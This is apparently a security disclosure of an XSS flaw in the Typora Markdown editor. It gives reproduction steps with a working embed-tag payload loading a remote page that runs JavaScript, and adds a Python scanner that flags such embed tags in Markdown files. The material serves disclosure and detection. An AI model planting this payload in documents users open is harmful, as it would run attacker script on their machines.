Typora XSS Vulnerability

Vulnerability Overview

An XSS vulnerability exists because the editor mishandles the embed tag when parsing HTML. The HTML tag is <embed src="https://c0olw.github.io/pic/1.html">

Vulnerability Reproduction

  1. Download the latest version of Typora from https://typora.io/.

    The version I downloaded was 1.6.7.

  2. Use Typora to open or edit a markdown file.

    For example, I created a file called “xss test.md” with Typora.

  3. Enter <embed src="https://c0olw.github.io/pic/1.html"> so that Typora parses the HTML tag, which results in the execution of malicious JavaScript.

    Screenshot: when just entering the embed tag.

    Screenshot: after Typora parses the embed tag.
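
A check to run on a Markdown file before opening it, for the pattern reproduced above. This is an added example, not part of the original report: it lists every embed tag outside fenced code blocks, with its line number and whether src points at a remote host. The function names and the sample document are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

FENCE_OPEN = re.compile(r"^ {0,3}(`{3,}|~{3,})")

def blank_fenced_code(text):
    """Blank fenced code blocks (shown as code, not parsed as HTML); keep line numbers."""
    out, fence = [], None
    for line in text.splitlines():
        s = line.strip()
        if fence is None:
            m = FENCE_OPEN.match(line)
            fence = m.group(1) if m else None
            out.append("" if m else line)
        else:
            if s and set(s) == {fence[0]} and len(s) >= len(fence):
                fence = None  # closing fence reached
            out.append("")
    return "\n".join(out)

class EmbedFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        if tag != "embed":
            return
        src = (dict(attrs).get("src") or "").strip()
        try:
            remote = bool(urlsplit(src).netloc)  # http(s)://host or //host
        except ValueError:
            remote = True  # unparsable URL: treat as suspicious
        self.findings.append({"line": self.getpos()[0], "src": src, "remote": remote})

def scan_markdown(text):
    """Return embed findings outside fenced code; inline code spans are still flagged."""
    finder = EmbedFinder()
    finder.feed(blank_fenced_code(text))
    finder.close()
    return finder.findings

TICKS = "`" * 3  # built at runtime so this example can sit inside a fenced block
SAMPLE = "\n".join([  # constructed sample document
    "# notes", "", '<embed src="https://example.invalid/payload.html">', "",
    TICKS + "html", '<embed src="https://example.invalid/in-code.html">', TICKS, "",
    "<EMBED SRC='local.pdf'>"])
```

On the constructed sample, scan_markdown(SAMPLE) reports the remote embed on line 3 and the local one on line 9, and skips the tag inside the fenced block.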